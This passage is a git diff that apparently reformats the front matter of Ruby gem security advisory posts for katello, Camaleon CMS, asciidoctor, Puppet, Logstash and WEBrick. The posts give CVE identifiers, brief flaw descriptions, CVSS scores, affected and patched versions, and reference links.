+    - https://github.com/twbs/bootstrap-rubygem/commit/f34c43c936ac7d0ebb129289321d8c51cd56aed1#diff-4e736e880b7fc39eb5e85576b629f6e3cd08f02f45104a7b4581f82852e97a81R1306
+    - https://github.com/twbs/bootstrap/commit/149096016f70fd815540d62c0989fd99cdc809e0
+    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2018-14040.yml
+    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
+    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
+    - https://github.com/advisories/GHSA-3wqf-4x89-9g79
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-14623.md b/advisories/_posts/2022-05-13-CVE-2018-14623.md
index 656c7e8c..2ae5e99a 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-14623.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-14623.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2018-14623 (katello): katello SQL Injection vulnerability'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2018-14623
-  ghsa: jx5v-788g-qw58
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14623
-  title: katello SQL Injection vulnerability
-  date: 2022-05-13
-  description: |
-    A SQL injection flaw was found in katello's errata-related API. An authenticated
-    remote attacker can craft input data to force a malformed SQL query to the backend
-    database, which will leak internal IDs. This is issue is related to an incomplete
-    fix for CVE-2016-3072. Version 3.10 and older is vulnerable.
-  cvss_v3: 4.3
-  related:
-    url:
-    - https://web.archive.org/web/20200227100255/http://www.securityfocus.com/bid/106224
-    ghsa:
-    - 527r-mfmj-prqf
----
+---
+layout: advisory
+title: 'CVE-2018-14623 (katello): katello SQL Injection vulnerability'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2018-14623
+  ghsa: jx5v-788g-qw58
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14623
+  title: katello SQL Injection vulnerability
+  date: 2022-05-13
+  description: |
+    A SQL injection flaw was found in katello's errata-related API. An authenticated
+    remote attacker can craft input data to force a malformed SQL query to the backend
+    database, which will leak internal IDs. This is issue is related to an incomplete
+    fix for CVE-2016-3072. Version 3.10 and older is vulnerable.
+  cvss_v3: 4.3
+  related:
+    url:
+    - https://web.archive.org/web/20200227100255/http://www.securityfocus.com/bid/106224
+    ghsa:
+    - 527r-mfmj-prqf
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-18260.md b/advisories/_posts/2022-05-13-CVE-2018-18260.md
index f9362dc6..f7b7c783 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-18260.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-18260.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2018-18260 (camaleon_cms): Camaleon CMS vulnerable to Stored Cross-site
-  Scripting'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2018-18260
-  ghsa: 7f84-9cqf-g4j9
-  url: http://packetstormsecurity.com/files/149772/CAMALEON-CMS-2.4-Cross-Site-Scripting.html
-  title: Camaleon CMS vulnerable to Stored Cross-site Scripting
-  date: 2022-05-13
-  description: |
-    In the 2.4 version of Camaleon CMS, Stored XSS has been discovered. The
-    profile image in the User settings section can be run in the update / upload area
-    via `/admin/media/upload?actions=false`.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 2.4"
----
+---
+layout: advisory
+title: 'CVE-2018-18260 (camaleon_cms): Camaleon CMS vulnerable to Stored Cross-site
+  Scripting'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2018-18260
+  ghsa: 7f84-9cqf-g4j9
+  url: http://packetstormsecurity.com/files/149772/CAMALEON-CMS-2.4-Cross-Site-Scripting.html
+  title: Camaleon CMS vulnerable to Stored Cross-site Scripting
+  date: 2022-05-13
+  description: |
+    In the 2.4 version of Camaleon CMS, Stored XSS has been discovered. The
+    profile image in the User settings section can be run in the update / upload area
+    via `/admin/media/upload?actions=false`.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 2.4"
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2018-18385.md b/advisories/_posts/2022-05-13-CVE-2018-18385.md
index 68c31811..5b8e2b62 100644
--- a/advisories/_posts/2022-05-13-CVE-2018-18385.md
+++ b/advisories/_posts/2022-05-13-CVE-2018-18385.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2018-18385 (asciidoctor): Asciidoctor Infinite Loop vulnerability'
-comments: false
-categories:
-- asciidoctor
-advisory:
-  gem: asciidoctor
-  cve: 2018-18385
-  ghsa: qc9p-mjxm-j2wj
-  url: https://github.com/asciidoctor/asciidoctor/issues/2888
-  title: Asciidoctor Infinite Loop vulnerability
-  date: 2022-05-13
-  description: |
-    Asciidoctor in versions < 1.5.8 allows remote attackers to cause a denial
-    of service (infinite loop). The loop was caused by the fact that `Parser.next_block`
-    was not exhausting all the lines in the reader as the while loop expected it would.
-    This was happening because the regular expression that detects any list was not
-    agreeing with the regular expression that detects a specific list type. So the line
-    kept getting pushed back onto the reader, hence causing the loop.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.5.8"
----
+---
+layout: advisory
+title: 'CVE-2018-18385 (asciidoctor): Asciidoctor Infinite Loop vulnerability'
+comments: false
+categories:
+- asciidoctor
+advisory:
+  gem: asciidoctor
+  cve: 2018-18385
+  ghsa: qc9p-mjxm-j2wj
+  url: https://github.com/asciidoctor/asciidoctor/issues/2888
+  title: Asciidoctor Infinite Loop vulnerability
+  date: 2022-05-13
+  description: |
+    Asciidoctor in versions < 1.5.8 allows remote attackers to cause a denial
+    of service (infinite loop). The loop was caused by the fact that `Parser.next_block`
+    was not exhausting all the lines in the reader as the while loop expected it would.
+    This was happening because the regular expression that detects any list was not
+    agreeing with the regular expression that detects a specific list type. So the line
+    kept getting pushed back onto the reader, hence causing the loop.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.5.8"
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2011-0528.md b/advisories/_posts/2022-05-14-CVE-2011-0528.md
index b307e1b1..81121095 100644
--- a/advisories/_posts/2022-05-14-CVE-2011-0528.md
+++ b/advisories/_posts/2022-05-14-CVE-2011-0528.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2011-0528 (puppet): Puppet does not properly restrict access to node resources'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2011-0528
-  ghsa: 9pvx-fwwh-w289
-  url: https://github.com/advisories/GHSA-9pvx-fwwh-w289
-  title: Puppet does not properly restrict access to node resources
-  date: 2022-05-14
-  description: |
-    Puppet 2.6.0 through 2.6.3 does not properly restrict access to node
-    resources, which allows remote authenticated Puppet nodes to read
-    or modify the resources of other nodes via unspecified vectors.
-  cvss_v2: 5.5
-  unaffected_versions:
-  - "< 2.6.0"
-  patched_versions:
-  - ">= 2.6.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-0528
-    - https://github.com/puppetlabs/puppet/commit/eee1a9cdaa5cab6222c8e6ab087d319f976fa4e3
-    - https://www.mail-archive.com/puppet-users@googlegroups.com/msg16429.html
-    - http://www.openwall.com/lists/oss-security/2011/01/27/6
-    - http://www.openwall.com/lists/oss-security/2011/01/31/5
-    - http://www.ubuntu.com/usn/USN-1365-1
-    - https://github.com/advisories/GHSA-9pvx-fwwh-w289
----
+---
+layout: advisory
+title: 'CVE-2011-0528 (puppet): Puppet does not properly restrict access to node resources'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2011-0528
+  ghsa: 9pvx-fwwh-w289
+  url: https://github.com/advisories/GHSA-9pvx-fwwh-w289
+  title: Puppet does not properly restrict access to node resources
+  date: 2022-05-14
+  description: |
+    Puppet 2.6.0 through 2.6.3 does not properly restrict access to node
+    resources, which allows remote authenticated Puppet nodes to read
+    or modify the resources of other nodes via unspecified vectors.
+  cvss_v2: 5.5
+  unaffected_versions:
+  - "< 2.6.0"
+  patched_versions:
+  - ">= 2.6.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-0528
+    - https://github.com/puppetlabs/puppet/commit/eee1a9cdaa5cab6222c8e6ab087d319f976fa4e3
+    - https://www.mail-archive.com/puppet-users@googlegroups.com/msg16429.html
+    - http://www.openwall.com/lists/oss-security/2011/01/27/6
+    - http://www.openwall.com/lists/oss-security/2011/01/31/5
+    - http://www.ubuntu.com/usn/USN-1365-1
+    - https://github.com/advisories/GHSA-9pvx-fwwh-w289
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2011-3869.md b/advisories/_posts/2022-05-14-CVE-2011-3869.md
index 0e0474c9..62f72ee8 100644
--- a/advisories/_posts/2022-05-14-CVE-2011-3869.md
+++ b/advisories/_posts/2022-05-14-CVE-2011-3869.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2011-3869 (puppet): Puppet arbitrary file overwrite'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2011-3869
-  ghsa: 8c56-v25w-f89c
-  url: https://puppet.com/security/cve/cve-2011-3869
-  title: Puppet arbitrary file overwrite
-  date: 2022-05-14
-  description: |
-    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows
-    local users to overwrite arbitrary files via a symlink attack
-    on the .k5login file.
-  patched_versions:
-  - "~> 2.6.11"
-  - ">= 2.7.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-3869
-    - https://puppet.com/security/cve/cve-2011-3869
-    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
-    - https://github.com/puppetlabs/puppet/commit/2775c21ae48e189950dbea5e7b4d1d9fa2aca41c
-    - https://github.com/puppetlabs/puppet/commit/7d4c169df84fc7bbeb2941bf995a63470f71bdbd
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
-    - http://www.debian.org/security/2011/dsa-2314
-    - http://www.ubuntu.com/usn/USN-1223-1
-    - http://www.ubuntu.com/usn/USN-1223-2
-    - https://github.com/advisories/GHSA-8c56-v25w-f89c
----
+---
+layout: advisory
+title: 'CVE-2011-3869 (puppet): Puppet arbitrary file overwrite'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2011-3869
+  ghsa: 8c56-v25w-f89c
+  url: https://puppet.com/security/cve/cve-2011-3869
+  title: Puppet arbitrary file overwrite
+  date: 2022-05-14
+  description: |
+    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows
+    local users to overwrite arbitrary files via a symlink attack
+    on the .k5login file.
+  patched_versions:
+  - "~> 2.6.11"
+  - ">= 2.7.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-3869
+    - https://puppet.com/security/cve/cve-2011-3869
+    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
+    - https://github.com/puppetlabs/puppet/commit/2775c21ae48e189950dbea5e7b4d1d9fa2aca41c
+    - https://github.com/puppetlabs/puppet/commit/7d4c169df84fc7bbeb2941bf995a63470f71bdbd
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
+    - http://www.debian.org/security/2011/dsa-2314
+    - http://www.ubuntu.com/usn/USN-1223-1
+    - http://www.ubuntu.com/usn/USN-1223-2
+    - https://github.com/advisories/GHSA-8c56-v25w-f89c
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2012-1987.md b/advisories/_posts/2022-05-14-CVE-2012-1987.md
index f36d9b18..e5241c79 100644
--- a/advisories/_posts/2022-05-14-CVE-2012-1987.md
+++ b/advisories/_posts/2022-05-14-CVE-2012-1987.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2012-1987 (puppet): Puppet Denial of Service and Arbitrary File Write'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-1987
-  ghsa: v58w-6xc2-w799
-  url: https://github.com/advisories/GHSA-v58w-6xc2-w799
-  title: Puppet Denial of Service and Arbitrary File Write
-  date: 2022-05-14
-  description: |
-    A vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13,
-    and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1
-    allows remote authenticated users with agent SSL keys to **(1)** cause a denial
-    of service (memory consumption) via a REST request to a stream that triggers a thread
-    block, as demonstrated using CVE-2012-1986 and `/dev/random`; or **(2)** cause a
-    denial of service (filesystem consumption) via crafted REST requests that use "a
-    marshaled form of a `Puppet::FileBucket::File object`" to write to arbitrary file
-    locations.
-  cvss_v2: 3.5
-  unaffected_versions:
-  - "< 2.6.0"
-  patched_versions:
-  - "~> 2.6.15"
-  - ">= 2.7.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-1987
-    - https://web.archive.org/web/20160808163232/https://puppet.com/security/cve/cve-2012-1987
-    - https://web.archive.org/web/20120513213318/http://projects.puppetlabs.com/issues/13553
-    - https://web.archive.org/web/20120513224202/http://projects.puppetlabs.com/issues/13552
-    - https://web.archive.org/web/20121005145241/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15
-    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
-    - https://github.com/puppetlabs/puppet/commit/0d6d29933e613fe177e9235415919a5428db67bc
-    - https://github.com/puppetlabs/puppet/commit/568ded50ec6cc498ad32ff7f086d9f73b5d24c14
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74794
-    - https://hermes.opensuse.org/messages/14523305
-    - https://hermes.opensuse.org/messages/15087408
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079289.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html
-    - http://ubuntu.com/usn/usn-1419-1
-    - http://www.debian.org/security/2012/dsa-2451
-    - https://github.com/advisories/GHSA-v58w-6xc2-w799
----
+---
+layout: advisory
+title: 'CVE-2012-1987 (puppet): Puppet Denial of Service and Arbitrary File Write'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-1987
+  ghsa: v58w-6xc2-w799
+  url: https://github.com/advisories/GHSA-v58w-6xc2-w799
+  title: Puppet Denial of Service and Arbitrary File Write
+  date: 2022-05-14
+  description: |
+    A vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13,
+    and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1
+    allows remote authenticated users with agent SSL keys to **(1)** cause a denial
+    of service (memory consumption) via a REST request to a stream that triggers a thread
+    block, as demonstrated using CVE-2012-1986 and `/dev/random`; or **(2)** cause a
+    denial of service (filesystem consumption) via crafted REST requests that use "a
+    marshaled form of a `Puppet::FileBucket::File object`" to write to arbitrary file
+    locations.
+  cvss_v2: 3.5
+  unaffected_versions:
+  - "< 2.6.0"
+  patched_versions:
+  - "~> 2.6.15"
+  - ">= 2.7.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-1987
+    - https://web.archive.org/web/20160808163232/https://puppet.com/security/cve/cve-2012-1987
+    - https://web.archive.org/web/20120513213318/http://projects.puppetlabs.com/issues/13553
+    - https://web.archive.org/web/20120513224202/http://projects.puppetlabs.com/issues/13552
+    - https://web.archive.org/web/20121005145241/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15
+    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
+    - https://github.com/puppetlabs/puppet/commit/0d6d29933e613fe177e9235415919a5428db67bc
+    - https://github.com/puppetlabs/puppet/commit/568ded50ec6cc498ad32ff7f086d9f73b5d24c14
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74794
+    - https://hermes.opensuse.org/messages/14523305
+    - https://hermes.opensuse.org/messages/15087408
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079289.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html
+    - http://ubuntu.com/usn/usn-1419-1
+    - http://www.debian.org/security/2012/dsa-2451
+    - https://github.com/advisories/GHSA-v58w-6xc2-w799
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2012-1988.md b/advisories/_posts/2022-05-14-CVE-2012-1988.md
index 8ad769cc..55713aa6 100644
--- a/advisories/_posts/2022-05-14-CVE-2012-1988.md
+++ b/advisories/_posts/2022-05-14-CVE-2012-1988.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2012-1988 (puppet): Puppet Arbitrary Command Execution'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-1988
-  ghsa: 6xxq-j39w-g3f6
-  url: https://github.com/advisories/GHSA-6xxq-j39w-g3f6
-  title: Puppet Arbitrary Command Execution
-  date: 2022-05-14
-  description: |
-    Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise
-    (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated
-    users with agent SSL keys and file-creation permissions on the puppet master to
-    execute arbitrary commands by creating a file whose full pathname contains shell
-    metacharacters, then performing a filebucket request.
-  cvss_v2: 6.0
-  unaffected_versions:
-  - "< 2.6.0"
-  patched_versions:
-  - "~> 2.6.15"
-  - ">= 2.7.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-1988
-    - https://web.archive.org/web/20121013181707/http://puppetlabs.com/security/cve/cve-2012-1988
-    - https://web.archive.org/web/20120513213112/http://projects.puppetlabs.com/issues/13518
-    - https://web.archive.org/web/20120816020421/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15
-    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
-    - https://github.com/puppetlabs/puppet/commit/0d6d29933e613fe177e9235415919a5428db67bc
-    - https://github.com/puppetlabs/puppet/commit/568ded50ec6cc498ad32ff7f086d9f73b5d24c14
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74796
-    - https://hermes.opensuse.org/messages/14523305
-    - https://hermes.opensuse.org/messages/15087408
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079289.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html
-    - http://ubuntu.com/usn/usn-1419-1
-    - http://www.debian.org/security/2012/dsa-2451
-    - https://github.com/advisories/GHSA-6xxq-j39w-g3f6
----
+---
+layout: advisory
+title: 'CVE-2012-1988 (puppet): Puppet Arbitrary Command Execution'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-1988
+  ghsa: 6xxq-j39w-g3f6
+  url: https://github.com/advisories/GHSA-6xxq-j39w-g3f6
+  title: Puppet Arbitrary Command Execution
+  date: 2022-05-14
+  description: |
+    Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise
+    (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated
+    users with agent SSL keys and file-creation permissions on the puppet master to
+    execute arbitrary commands by creating a file whose full pathname contains shell
+    metacharacters, then performing a filebucket request.
+  cvss_v2: 6.0
+  unaffected_versions:
+  - "< 2.6.0"
+  patched_versions:
+  - "~> 2.6.15"
+  - ">= 2.7.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-1988
+    - https://web.archive.org/web/20121013181707/http://puppetlabs.com/security/cve/cve-2012-1988
+    - https://web.archive.org/web/20120513213112/http://projects.puppetlabs.com/issues/13518
+    - https://web.archive.org/web/20120816020421/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15
+    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
+    - https://github.com/puppetlabs/puppet/commit/0d6d29933e613fe177e9235415919a5428db67bc
+    - https://github.com/puppetlabs/puppet/commit/568ded50ec6cc498ad32ff7f086d9f73b5d24c14
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74796
+    - https://hermes.opensuse.org/messages/14523305
+    - https://hermes.opensuse.org/messages/15087408
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079289.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html
+    - http://ubuntu.com/usn/usn-1419-1
+    - http://www.debian.org/security/2012/dsa-2451
+    - https://github.com/advisories/GHSA-6xxq-j39w-g3f6
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2014-4326.md b/advisories/_posts/2022-05-14-CVE-2014-4326.md
index 7cda20bd..5a57b5ba 100644
--- a/advisories/_posts/2022-05-14-CVE-2014-4326.md
+++ b/advisories/_posts/2022-05-14-CVE-2014-4326.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2014-4326 (logstash): Elasticsearch Logstash allows remote attackers to
-  execute arbitrary commands'
-comments: false
-categories:
-- logstash
-advisory:
-  gem: logstash
-  cve: 2014-4326
-  ghsa: 8qhq-rq4j-8prj
-  url: https://www.elastic.co/community/security
-  title: Elasticsearch Logstash allows remote attackers to execute arbitrary commands
-  date: 2022-05-14
-  description: |
-    Elasticsearch Logstash 1.0.14 through 1.4.x before 1.4.2 allows
-    remote attackers to execute arbitrary commands via a crafted
-    event in (1) `zabbix.rb` or (2) `nagios_nsca.rb` in `outputs/`.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 1.0.14"
-  patched_versions:
-  - ">= 1.4.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-4326
-    - https://www.elastic.co/community/security
-    - https://web.archive.org/web/20140804031140/http://www.elasticsearch.org/blog/logstash-1-4-2
-    - https://web.archive.org/web/20201207013408/http://www.securityfocus.com/archive/1/532841/100/0/threaded
-    - https://github.com/advisories/GHSA-8qhq-rq4j-8prj
----
+---
+layout: advisory
+title: 'CVE-2014-4326 (logstash): Elasticsearch Logstash allows remote attackers to
+  execute arbitrary commands'
+comments: false
+categories:
+- logstash
+advisory:
+  gem: logstash
+  cve: 2014-4326
+  ghsa: 8qhq-rq4j-8prj
+  url: https://www.elastic.co/community/security
+  title: Elasticsearch Logstash allows remote attackers to execute arbitrary commands
+  date: 2022-05-14
+  description: |
+    Elasticsearch Logstash 1.0.14 through 1.4.x before 1.4.2 allows
+    remote attackers to execute arbitrary commands via a crafted
+    event in (1) `zabbix.rb` or (2) `nagios_nsca.rb` in `outputs/`.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 1.0.14"
+  patched_versions:
+  - ">= 1.4.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4326
+    - https://www.elastic.co/community/security
+    - https://web.archive.org/web/20140804031140/http://www.elasticsearch.org/blog/logstash-1-4-2
+    - https://web.archive.org/web/20201207013408/http://www.securityfocus.com/archive/1/532841/100/0/threaded
+    - https://github.com/advisories/GHSA-8qhq-rq4j-8prj
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2016-3072.md b/advisories/_posts/2022-05-14-CVE-2016-3072.md
index 175afef7..74e2b36f 100644
--- a/advisories/_posts/2022-05-14-CVE-2016-3072.md
+++ b/advisories/_posts/2022-05-14-CVE-2016-3072.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2016-3072 (katello): Katello SQL Injection vulnerabilities'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2016-3072
-  ghsa: 527r-mfmj-prqf
-  url: https://github.com/Katello/katello/pull/6051
-  title: Katello SQL Injection vulnerabilities
-  date: 2022-05-14
-  description: |
-    Multiple SQL injection vulnerabilities in the scoped_search function
-    in app/controllers/katello/api/v2/api_controller.rb in Katello allow remote authenticated
-    users to execute arbitrary SQL commands via the (1) sort_by or (2) sort_order parameter.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 2.4.3"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2016:1083
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1322050
-    - https://github.com/Katello/katello/commit/5645ed4365980a34e30a9c57fe0793dff729e8e4
-    - https://access.redhat.com/security/cve/CVE-2016-3072
----
+---
+layout: advisory
+title: 'CVE-2016-3072 (katello): Katello SQL Injection vulnerabilities'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2016-3072
+  ghsa: 527r-mfmj-prqf
+  url: https://github.com/Katello/katello/pull/6051
+  title: Katello SQL Injection vulnerabilities
+  date: 2022-05-14
+  description: |
+    Multiple SQL injection vulnerabilities in the scoped_search function
+    in app/controllers/katello/api/v2/api_controller.rb in Katello allow remote authenticated
+    users to execute arbitrary SQL commands via the (1) sort_by or (2) sort_order parameter.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 2.4.3"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2016:1083
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1322050
+    - https://github.com/Katello/katello/commit/5645ed4365980a34e30a9c57fe0793dff729e8e4
+    - https://access.redhat.com/security/cve/CVE-2016-3072
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2017-10784.md b/advisories/_posts/2022-05-14-CVE-2017-10784.md
index d7574d53..496a5fb0 100644
--- a/advisories/_posts/2022-05-14-CVE-2017-10784.md
+++ b/advisories/_posts/2022-05-14-CVE-2017-10784.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2017-10784 (webrick): WEBrick RCE Vulnerability'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2017-10784
-  ghsa: 369m-2gv6-mw28
-  url: https://access.redhat.com/errata/RHSA-2017:3485
-  title: WEBrick RCE Vulnerability
-  date: 2022-05-14
-  description: |
-    The Basic authentication code in WEBrick library in Ruby before 2.2.8,
-    2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal
-    emulator escape sequences into its log and possibly execute arbitrary commands via
-    a crafted user name.
-  cvss_v2: 9.3
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-10784
-    - https://access.redhat.com/errata/RHSA-2017:3485
-    - https://access.redhat.com/errata/RHSA-2018:0378
-    - https://access.redhat.com/errata/RHSA-2018:0583
-    - https://access.redhat.com/errata/RHSA-2018:0585
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://security.gentoo.org/glsa/201710-18
-    - https://usn.ubuntu.com/3528-1/
-    - https://usn.ubuntu.com/3685-1/
-    - https://www.debian.org/security/2017/dsa-4031
-    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-2-8-released/
-    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-3-5-released/
-    - https://www.ruby-lang.org/en/news/2017/09/14/webrick-basic-auth-escape-sequence-injection-cve-2017-10784/
-    - https://web.archive.org/web/20210621131814/http://www.securityfocus.com/bid/100853
-    - https://web.archive.org/web/20210919031115/http://www.securitytracker.com/id/1042004
-    - https://web.archive.org/web/20211025092552/http://www.securitytracker.com/id/1039363
-    - https://github.com/ruby/ruby/commit/6617c41292
-    - https://github.com/ruby/webrick/commit/4ac0f3843ab82d1c31e1cfc719409208adef7813
-    - https://hackerone.com/reports/223363
-    - https://github.com/advisories/GHSA-369m-2gv6-mw28
-  notes: 'Versions in description: field are ruby versions, not ruby gem'
----
+---
+layout: advisory
+title: 'CVE-2017-10784 (webrick): WEBrick RCE Vulnerability'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2017-10784
+  ghsa: 369m-2gv6-mw28
+  url: https://access.redhat.com/errata/RHSA-2017:3485
+  title: WEBrick RCE Vulnerability
+  date: 2022-05-14
+  description: |
+    The Basic authentication code in WEBrick library in Ruby before 2.2.8,
+    2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal
+    emulator escape sequences into its log and possibly execute arbitrary commands via
+    a crafted user name.
+  cvss_v2: 9.3
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-10784
+    - https://access.redhat.com/errata/RHSA-2017:3485
+    - https://access.redhat.com/errata/RHSA-2018:0378
+    - https://access.redhat.com/errata/RHSA-2018:0583
+    - https://access.redhat.com/errata/RHSA-2018:0585
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://security.gentoo.org/glsa/201710-18
+    - https://usn.ubuntu.com/3528-1/
+    - https://usn.ubuntu.com/3685-1/
+    - https://www.debian.org/security/2017/dsa-4031
+    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-2-8-released/
+    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-3-5-released/
+    - https://www.ruby-lang.org/en/news/2017/09/14/webrick-basic-auth-escape-sequence-injection-cve-2017-10784/
+    - https://web.archive.org/web/20210621131814/http://www.securityfocus.com/bid/100853
